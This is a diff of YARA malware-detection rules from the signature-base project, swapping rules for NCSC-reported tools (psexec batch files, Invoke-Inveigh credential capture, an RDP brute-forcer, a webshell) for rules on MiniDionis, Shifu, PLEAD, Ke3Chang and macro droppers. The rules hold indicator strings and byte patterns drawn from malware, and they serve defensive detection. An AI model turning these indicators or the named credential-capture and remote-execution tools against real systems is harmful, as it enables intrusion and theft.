+		logic_hash = "813df8459e4a53a084dc1f902713af74747a0c2f4ef535e682de38acba9b0e5e"
+		score = 50
+		quality = 60
+		tags = "HIGHVOL, FILE"
 
 	strings:
-		$a1 = {38 38 31 34 35 36 46 43}
+		$a1 = "var a0_0x"
+		$c1 = "))),function(){try{var _0x"
+		$c2 = "=Function('return\\x20(function()\\x20'+'{}.constructor(\\x22return\\x20this\\x22)(\\x20)'+');');"
+		$c3 = "['atob']=function("
+		$c4 = ")['replace'](/=+$/,'');var"
+		$c5 = "return!![]"
+		$c6 = "'{}.constructor(\\x22return\\\x20this\\x22)(\\x20)'"
+		$c7 = "{}.constructor(\x22return\x20this\x22)(\x20)" base64
+		$c8 = "while(!![])"
+		$c9 = "while (!![])"
+		$d1 = /(parseInt\(_0x([a-f0-9]{2}){2,4}\(0x[a-f0-9]{1,5}\)\)\/0x[a-f0-9]{1,2}\)?(\+|\*\()\-?){6}/
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of ( $a* )
+		$a1 at 0 or ( filesize < 1000000 and ( 3 of ( $c* ) or $d1 ) )
 }
-rule SIGNATURE_BASE_Sleep_Timer_Choice : FILE
+rule SIGNATURE_BASE_Minidionis_Readerview : FILE
 {
 	meta:
-		description = "Detects malware from NCSC report"
-		author = "NCSC"
-		id = "c64db0dd-2858-5508-ac51-d3318113a060"
-		date = "2018-04-06"
+		description = "MiniDionis Malware - file readerView.exe / adobe.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dc8d4311-2a87-5c9b-95ff-52708f293f01"
+		date = "2015-07-20"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ncsc_report_04_2018.yar#L39-L52"
+		reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_minidionis.yar#L10-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b5278301da06450fe4442a25dda2d83d21485be63598642573f59c59e980ad46"
-		logic_hash = "5d2b656aabb113c50805d4af0faa62f579547dd4ec328ff2778fab64d778b8b9"
+		logic_hash = "45ae1be675f2b7b3d89aea2bde66f9f96b55b6fbf81e3783c209c7d6d4355026"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145"
+		hash2 = "a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004"
+		hash3 = "88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f"
+		hash4 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7"
+		hash5 = "ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46"
+		hash6 = "56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e"
 
 	strings:
-		$a1 = {8b0424b90f00000083f9ff743499f7f98d420f}
+		$s1 = "%ws_out%ws" fullword wide
+		$s2 = "dnlibsh" fullword ascii
+		$op0 = { 0f b6 80 68 0e 41 00 0b c8 c1 e1 08 0f b6 c2 8b }
+		$op1 = { 8b ce e8 f8 01 00 00 85 c0 74 41 83 7d f8 00 0f }
+		$op2 = { e8 2f a2 ff ff 83 20 00 83 c8 ff 5f 5e 5d c3 55 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of ( $a* )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of ( $s* ) and 1 of ( $op* )
 }
-rule SIGNATURE_BASE_User_Function_String
+rule SIGNATURE_BASE_Malicious_SFX1 : FILE
 {
 	meta:
-		description = "Detects user function string from NCSC report"
-		author = "NCSC"
-		id = "563ac6af-6b37-53c6-ae13-d97e31edb088"
-		date = "2018-04-06"
+		description = "SFX with voicemail content"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7c29dfb0-bbed-5017-80b4-a5c44024cd70"
+		date = "2015-07-20"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ncsc_report_04_2018.yar#L54-L71"
+		reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_minidionis.yar#L39-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b5278301da06450fe4442a25dda2d83d21485be63598642573f59c59e980ad46"
-		logic_hash = "04821d1d5c12b5a9aca3c5b4be9f7a7d35320ad1503ccbdadebc7710c613a976"
+		hash = "c0675b84f5960e95962d299d4c41511bbf6f8f5f5585bdacd1ae567e904cb92f"
+		logic_hash = "fd7b4c504a52e68fe87eeb9f7066c61ddc47257ac9324a60d219c022d3affbbf"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a2 = "e.RandomHashString"
-		$a3 = "e.Decode"
-		$a4 = "e.Decrypt"
-		$a5 = "e.HashStr"
-		$a6 = "e.FromB64"
+		$s0 = "voicemail" ascii
+		$s1 = ".exe" ascii
 
 	condition:
-		4 of ( $a* )
+		uint16( 0 ) == 0x4b50 and filesize < 1000KB and $s0 in ( 3 .. 80 ) and $s1 in ( 3 .. 80 )
 }
-rule SIGNATURE_BASE_Generic_Shellcode_Downloader_Specific : FILE
+rule SIGNATURE_BASE_Malicious_SFX2 : FILE
 {
 	meta:
-		description = "Detects Doorshell from NCSC report"
-		author = "NCSC"
-		id = "ddd25add-ff84-5106-ac3c-5d5b4c1ef2a9"
-		date = "2018-04-06"
+		description = "SFX with adobe.exe content"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ff59d638-4d82-5a14-b346-3df2154d3c34"
+		date = "2015-07-20"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ncsc_report_04_2018.yar#L73-L89"
+		reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_minidionis.yar#L55-L70"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b8bc0611a7fd321d2483a0a9a505251e15c22402e0cfdc62c0258af53ed3658a"
-		logic_hash = "9315ad03b5a28030c32fea5547db3ae421a1ebdae0b96a8a4c2f92660c41bc40"
+		hash = "502e42dc99873c52c3ca11dd3df25aad40d2b083069e8c22dd45da887f81d14d"
+		logic_hash = "a2ed7660604ff3c9f2d0dbb454f5d168cd61d1d5e647b5c74fe24f25ebb3dbfd"
 		score = 75
-		quality = 79
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$push1 = {68 6C 6C 6F 63}
-		$push2 = {68 75 61 6C 41}
-		$push3 = {68 56 69 72 74}
-		$a = {BA 90 02 00 00 46 C1 C6 19 03 DD 2B F4 33 DE}
-		$b = {87 C0 81 F2 D1 19 89 14 C1 C8 1F FF E0}
+		$s1 = "adobe.exe" fullword ascii
+		$s2 = "Extracting files to %s folder$Extracting files to temporary folder" fullword wide
+		$s3 = "GETPASSWORD1" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3C ) ) == 0x4550 ) and ( $a or $b ) and @push1 < @push2 and @push2 < @push3
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_Batch_Script_To_Run_Psexec
+rule SIGNATURE_BASE_Minidionis_VBS_Dropped : FILE
 {
 	meta:
-		description = "Detects malicious batch file from NCSC report"
-		author = "NCSC"
-		id = "1fbeeec8-a5bd-569e-b435-c7d82d32e47b"
-		date = "2018-04-06"
+		description = "Dropped File - 1.vbs"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f0116861-4216-504a-a39b-463e7535a2b3"
+		date = "2015-07-21"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ncsc_report_04_2018.yar#L91-L107"
+		reference = "https://malwr.com/analysis/ZDc4ZmIyZDI4MTVjNGY5NWI0YzE3YjIzNGFjZTcyYTY/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_minidionis.yar#L72-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b7d7c4bc8f9fd0e461425747122a431f93062358ed36ce281147998575ee1a18"
-		logic_hash = "9bdaa14aa535c178914f83c12b23484162f085c6fc6041d379268546ee99f462"
+		hash = "97dd1ee3aca815eb655a5de9e9e8945e7ba57f458019be6e1b9acb5731fa6646"
+		logic_hash = "a24fe4cdff6dd7951af10710eb63ab1fd90ab0e43bbce4388d6687abac206da5"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "Tokens=1 delims=" ascii
-		$ = "SET ws=%1" ascii
-		$ = "Checking %ws%" ascii
-		$ = "%TEMP%\\%ws%ns.txt" ascii
-		$ = "ps.exe -accepteula" ascii
+		$s1 = "Wscript.Sleep 5000" ascii
+		$s2 = "Set FSO = CreateObject(\"Scripting.FileSystemObject\")" ascii
+		$s3 = "Set WshShell = CreateObject(\"WScript.Shell\")" ascii
+		$s4 = "If(FSO.FileExists(\"" ascii
+		$s5 = "then FSO.DeleteFile(\".\\" ascii
 
 	condition:
-		3 of them
+		filesize < 1KB and all of them and $s1 in ( 0 .. 40 )
 }
-rule SIGNATURE_BASE_Batch_Powershell_Invoke_Inveigh
+rule SIGNATURE_BASE_Shifu_Banking_Trojan : FILE
 {
 	meta:
-		description = "Detects malicious batch file from NCSC report"
-		author = "NCSC"
-		id = "c5dab029-6515-5d58-9ccd-bf438ba692d5"
-		date = "2018-04-06"
+		description = "Detects Shifu Banking Trojan"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e86a98b1-a5c3-57b6-9449-dc36c04cebf3"
+		date = "2015-09-01"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ncsc_report_04_2018.yar#L109-L124"
+		reference = "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_shifu_trojan.yar#L8-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0a6b1b29496d4514f6485e78680ec4cd0296ef4d21862d8bf363900a4f8e3fd2"
-		logic_hash = "5048a180df301707622e9ad0b949da9e39d2f55f16fc43e7344a8181596a836c"
+		logic_hash = "f65fa80638e6a8bf8c5afb3dbe1262572ca0a7c56507369934ac3d958f3e6267"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4ff1ebea2096f318a2252ebe1726bcf3bbc295da9204b6c720b5bbf14de14bb2"
+		hash2 = "4881c7d89c2b5e934d4741a653fbdaf87cc5e7571b68c723504069d519d8a737"
 
 	strings:
-		$ = "Inveigh.ps1" ascii
-		$ = "Invoke-Inveigh" ascii
-		$ = "-LLMNR N -HTTP N -FileOutput Y" ascii
-		$ = "powershell.exe" ascii
+		$x1 = "c:\\oil\\feet\\Seven\\Send\\Gather\\Dividerail.pdb" fullword ascii
+		$s1 = "listen above" fullword wide
+		$s2 = "familycould cost" fullword wide
+		$s3 = "SetSystemTimeAdjustment" fullword ascii
+		$s4 = "PeekNamedPipe" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( $x1 or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_Lnk_Detect : FILE
+rule SIGNATURE_BASE_SHIFU_Banking_Trojan : FILE
 {
 	meta:
-		description = "Detects malicious LNK file from NCSC report"
-		author = "NCSC"
-		id = "76d382f3-b2f2-5ede-94b2-5ae8b766c194"
-		date = "2018-04-06"
+		description = "Detects SHIFU Banking Trojan"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b0d57a2b-31cc-5af0-84c3-5d178e2d244d"
+		date = "2015-10-31"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ncsc_report_04_2018.yar#L126-L149"
+		reference = "http://goo.gl/52n8WE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_shifu_trojan.yar#L29-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ae8796877d70f8ddd56bac8ed474231f26d9bc8e73625e65d5d927ab804996b3"
-		score = 75
+		logic_hash = "01f5217ee4e81b0b2ff37ccc7eed353ace26aa68538cce5bc207c0c071f0850a"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0066d1c8053ff8b0c07418c7f8d20e5cd64007bb850944269f611febd0c1afe0"
+		hash2 = "3956d32a870d81be34cafc867769b2a2f55a96360070f1cb3d9addc2918357d5"
+		hash3 = "3fde1b2b50fcb36a695f1e6bc577cd930c2343066d98982cf982393e55bfce0d"
+		hash4 = "457ad4a4d4e675fe09f63873ca3364434dc872dde7d9b64ce7db919eaff47485"
+		hash5 = "51edba913e8b83d1388b1be975957e439015289d51d3d5774d501551f220df6f"
+		hash6 = "6611a2b79a3acf0003b1197aa5bfe488a33db69b663c79c6c5b023e86818d38b"
+		hash7 = "72e239924faebf8209f8e3d093f264f778a55efb56b619f26cea73b1c4feb7a4"
+		hash8 = "7a29cb641b9ac33d1bb405d364bc6e9c7ce3e218a8ff295b75ca0922cf418290"
+		hash9 = "92fe4f9a87c796e993820d1bda8040aced36e316de67c9c0c5fc71aadc41e0f8"
+		hash10 = "93ecb6bd7c76e1b66f8c176418e73e274e2c705986d4ac9ede9d25db4091ab05"
+		hash11 = "a0b7fac69a4eb32953c16597da753b15060f6eba452d150109ff8aabc2c56123"
+		hash12 = "a8b6e798116ce0b268e2c9afac61536b8722e86b958bd2ee95c6ecdec86130c9"
+		hash13 = "d6244c1177b679b3d67f6cec34fe0ae87fba21998d4f5024d8eeaf15ca242503"
+		hash14 = "dcc9c38e695ffd121e793c91ca611a4025a116321443297f710a47ce06afb36d"
 
 	strings:
-		$lnk_magic = {4C 00 00 00 01 14 02 00 00 00 00 00 C0 00 00 00 00 00 00 46}
-		$lnk_target = {41 00 55 00 54 00 4F 00 45 00 58 00 45 00 43 00 2E 00 42 00 41 00 54}
-		$s1 = {5C 00 5C 00 31 00}
-		$s2 = {5C 00 5C 00 32 00}
-		$s3 = {5C 00 5C 00 33 00}
-		$s4 = {5C 00 5C 00 34 00}
-		$s5 = {5C 00 5C 00 35 00}
-		$s6 = {5C 00 5C 00 36 00}
-		$s7 = {5C 00 5C 00 37 00}
-		$s8 = {5C 00 5C 00 38 00}
-		$s9 = {5C 00 5C 00 39 00}
+		$x1 = "\\Gather\\Dividerail.pdb" ascii
+		$s0 = "\\payload\\payload.x86.pdb" ascii
+		$s1 = "USER_PRIV_GUEST" fullword wide
+		$s2 = "USER_PRIV_ADMIN" fullword wide
+		$s3 = "USER_PRIV_USER" fullword wide
+		$s4 = "PPSWVPP" fullword ascii
+		$s5 = "WinSCard.dll" fullword ascii
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and uint32be( 4 ) == 0x01140200 and ( ( $lnk_magic at 0 ) and $lnk_target ) and 1 of ( $s* )
+		uint16( 0 ) == 0x5a4d and ( $x1 or 5 of ( $s* ) )
 }
-rule SIGNATURE_BASE_RDP_Brute_Strings
+rule SIGNATURE_BASE_PLEAD_Downloader_Jun18_1 : FILE
 {
 	meta:
-		description = "Detects RDP brute forcer from NCSC report"
-		author = "NCSC"
-		id = "d6f0cdbc-a910-5826-b25a-61c2924f8e2a"
-		date = "2018-04-06"
+		description = "Detects PLEAD Downloader"
+		author = "Florian Roth (Nextron Systems)"
+		id = "19d588d8-1f03-5f34-b82e-b645c28a19a4"
+		date = "2018-06-16"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ncsc_report_04_2018.yar#L151-L174"
+		reference = "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_plead_downloader.yar#L1-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8234bf8a1b53efd2a452780a69666d1aedcec9eb1bb714769283ccc2c2bdcc65"
-		logic_hash = "80c51d82a57271409d298b5175505c4234a6c3ec8a8763c93b669d1f0a8d59ba"
+		logic_hash = "82fa4629aeb67a657af8b40527414e59d1c45a7c4e3c68398d3472c080c9487b"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a26df4f62ada084a596bf0f603691bc9c02024be98abec4a9872f0ff0085f940"
 
 	strings:
-		$ = "RDP Brute" ascii wide
-		$ = "RdpChecker" ascii
-		$ = "RdpBrute" ascii
-		$ = "Brute_Count_Password" ascii
-		$ = "BruteIPList" ascii
-		$ = "Chilkat_Socket_Key" ascii
-		$ = "Brute_Sync_Stat" ascii
-		$ = "(Error! Hyperlink reference not valid.)" wide
-		$ = "BadRDP" wide
-		$ = "GoodRDP" wide
-		$ = "@echo off{0}:loop{0}del {1}{0}if exist {1} goto loop{0}del {2}{0}del \"{2}\"" wide
-		$ = "Coded by z668" wide
+		$s1 = "%02d:%02d:%02d" ascii fullword
+		$s2 = "%02d-%02d-%02d" ascii fullword
+		$s3 = "1111%02d%02d%02d_%02d%02d2222" ascii fullword
+		$a1 = "Scanning..." wide fullword
+		$a2 = "Checking..." wide fullword
 
 	condition:
-		4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( all of ( $s* ) or ( 2 of ( $s* ) and 1 of ( $a* ) ) )
 }
-rule SIGNATURE_BASE_WEBSHELL_Z_Webshell_1
+rule SIGNATURE_BASE_SUSP_Gobfuscate_May21 : FILE
 {
 	meta:
-		description = "Detects Z Webshell from NCSC report"
-		author = "NCSC"
-		id = "f4b50760-bd3a-5e1f-bf32-50f16a42c381"
-		date = "2018-04-06"
-		modified = "2023-12-05"
-		old_rule_name = "Z_WebShell"
-		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ncsc_report_04_2018.yar#L176-L192"
+		description = "Identifies binaries obfuscated with gobfuscate"
+		author = "James Quinn, Paul Hager (merged with new similar pattern)"
+		id = "ae518296-b1c3-568c-bae0-3e0a6f7600ba"
+		date = "2021-05-14"
+		modified = "2024-04-02"
+		reference = "https://github.com/unixpickle/gobfuscate"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_gobfuscate.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ace12552f3a980f1eed4cadb02afe1bfb851cafc8e58fb130e1329719a07dbf0"
-		logic_hash = "1dfc546a7493c1443527ebe74ed8cd2b06ee032b9a3f736b830e16288e616d43"
-		score = 75
+		logic_hash = "f71078dd6354a482a2ead2f0d25f4172cd40e62440a70c2da7916b68f26909a3"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$ = "Z_PostBackJS" ascii wide
-		$ = "z_file_download" ascii wide
-		$ = "z_WebShell" ascii wide
-		$ = "1367948c7859d6533226042549228228" ascii wide
+		$s1 = { 0F B6 ?? ?? ?? 0F B6 ?? ?? ?? 31 D? [0-1] 88 ?? ?? ?? 48 FF C? 48 83 F? ?? 7C E6 48 }
+		$s2 = { 0F B6 ?? ?? ?? 31 DA 88 ?? ?? ?? 40 83 ?? ?? 7D 09 0F B6 }
 
 	condition:
-		3 of them
+		filesize < 50MB and any of them
 }
-rule SIGNATURE_BASE_APT_MAL_Winntilinux_Dropper_Azazelfork_May19 : AZAZEL_FORK FILE
+rule SIGNATURE_BASE_APT_KE3CHANG_TMPFILE : APT KE3CHANG TMPFILE FILE
 {
 	meta:
-		description = "Detection of Linux variant of Winnti"
-		author = "Silas Cutler (havex [@] chronicle.security), Chronicle Security"
-		id = "d641de9a-e563-5067-b7e4-0aa83a087ed4"
-		date = "2019-05-15"
+		description = "Detects Strings left in TMP Files created by K3CHANG Backdoor Ketrican"
+		author = "Markus Neis, Swisscom"
+		id = "84d411af-ea3d-5862-8c2f-7caca60c1b66"
+		date = "2020-06-18"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_linux.yar#L1-L16"
+		reference = "https://app.any.run/tasks/a96f4f9d-c27d-490b-b5d3-e3be0a1c93e9/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ke3chang.yar#L1-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4741c2884d1ca3a40dadd3f3f61cb95a59b11f99a0f980dbadc663b85eb77a2a"
-		logic_hash = "0af32675dccfd0ad0c7919683fddced6ad49c65800ffa523773b7342b431379f"
+		logic_hash = "75c97fe2eeb82e09f52e98d76bd529824f171da4c802b5febc1036314d8145f0"
 		score = 75
 		quality = 85
-		tags = "AZAZEL_FORK, FILE"
-		version = "1.0"
-		TLP = "White"
+		tags = "APT, KE3CHANG, TMPFILE, FILE"
+		hash1 = "4ef11e84d5203c0c425d1a76d4bf579883d40577c2e781cdccc2cc4c8a8d346f"
 
 	strings:
-		$config_decr = { 48 89 45 F0 C7 45 EC 08 01 00 00 C7 45 FC 28 00 00 00 EB 31 8B 45 FC 48 63 D0 48 8B 45 F0 48 01 C2 8B 45 FC 48 63 C8 48 8B 45 F0 48 01 C8 0F B6 00 89 C1 8B 45 F8 89 C6 8B 45 FC 01 F0 31 C8 88 02 83 45 FC 01 }
-		$export1 = "our_sockets"
-		$export2 = "get_our_pids"
+		$pps1 = "PSParentPath             : Microsoft.PowerShell.Core\\Registry::HKEY_CURRENT_USE" fullword ascii
+		$pps2 = "PSPath                   : Microsoft.PowerShell.Core\\Registry::HKEY_CURRENT_USE" fullword ascii
+		$psp1 = ": Microsoft.PowerShell.Core\\Registry" ascii
+		$s4 = "PSChildName  : PhishingFilter" fullword ascii
+		$s1 = "DisableFirstRunCustomize : 2" fullword ascii
+		$s7 = "PSChildName  : 3" fullword ascii
+		$s8 = "2500         : 3" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and all of them
+		uint16( 0 ) == 0x5350 and filesize < 1KB and $psp1 and 1 of ( $pps* ) and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_APT_MAL_Winntilinux_Main_Azazelfork_May19 : FILE
+rule SIGNATURE_BASE_APT_MAL_Ke3Chang_Ketrican_Jun20_1 : FILE
 {
 	meta:
-		description = "Detection of Linux variant of Winnti"
-		author = "Silas Cutler (havex [@] chronicle.security), Chronicle Security"
-		id = "a1693e2d-4d89-5cc7-ab14-c8feb000638a"
-		date = "2019-05-15"
+		description = "Detects Ketrican malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ccd8322e-c822-512a-9ac5-eabc9d09640b"
+		date = "2020-06-18"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_linux.yar#L18-L39"
+		reference = "BfV Cyber-Brief Nr. 01/2020"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ke3chang.yar#L23-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ae9d6848f33644795a0cc3928a76ea194b99da3c10f802db22034d9f695a0c23"
-		logic_hash = "3ff38795179f6c32f2ff014b06ac126ae3a0de3fe7515f0e49f12f9c8ff14b43"
+		logic_hash = "a2806de18432dbab24f08c7c2863fd694c91192cf7df4388dfeb87b237f22257"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
-		TLP = "White"
+		hash1 = "02ea0bc17875ab403c05b50205389065283c59e01de55e68cee4cf340ecea046"
+		hash2 = "f3efa600b2fa1c3c85f904a300fec56104d2caaabbb39a50a28f60e0fdb1df39"
 
 	strings:
-		$uuid_lookup = "/usr/sbin/dmidecode  | grep -i 'UUID' |cut -d' ' -f2 2>/dev/null"
-		$dbg_msg = "[advNetSrv] can not create a PF_INET socket"
-		$rtti_name1 = "CNetBase"
-		$rtti_name2 = "CMyEngineNetEvent"
-		$rtti_name3 = "CBufferCache"
-		$rtti_name4 = "CSocks5Base"
-		$rtti_name5 = "CDataEngine"
-		$rtti_name6 = "CSocks5Mgr"
-		$rtti_name7 = "CRemoteMsg"
+		$xc1 = { 00 59 89 85 D4 FB FF FF 8B 85 D4 FB FF FF 89 45
+               FC 68 E0 58 40 00 8F 45 FC E9 }
+		$op1 = { 6a 53 58 66 89 85 24 ff ff ff 6a 79 58 66 89 85 }
+		$op2 = { 8d 45 bc 50 53 53 6a 1c 8d 85 10 ff ff ff 50 ff }
 
 	condition:
-		uint16( 0 ) == 0x457f and ( ( $dbg_msg and 1 of ( $rtti* ) ) or ( 5 of ( $rtti* ) ) or ( $uuid_lookup and 2 of ( $rtti* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of ( $x* ) or 2 of them
 }
-rule SIGNATURE_BASE_Duqu2_Sample1 : FILE
+rule SIGNATURE_BASE_Gen_Macro_Shellexecute_Action : FILE
 {
 	meta:
-		description = "Detects malware - Duqu2 (cross-matches with IronTiger malware and Derusbi)"
-		author = "Florian Roth (Nextron Systems)"
-		id = "39ba04f1-df45-5513-ab8f-12097a79cdc7"
-		date = "2016-07-02"
+		description = "VBA macro technique to call ShellExecute to launch payload"
+		author = "John Lambert @JohnLaTwC"
+		id = "4ae3d3d9-de4a-5c5c-9a4a-bedc80b576be"
+		date = "2019-01-08"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_duqu2.yar#L10-L28"
+		reference = "https://twitter.com/ItsReallyNick/status/1091170625698316288"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_macro_ShellExecute_action.yar#L1-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bf6b60bcae2b41487ede11581c82b32e6bc912445008b1655e4f75be65cf6596"
-		score = 80
+		logic_hash = "da40175579f7d76d10ad0188851f111ba5d875ce990b2940166dd28eac2a742d"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6b146e3a59025d7085127b552494e8aaf76450a19c249bfed0b4c09f328e564f"
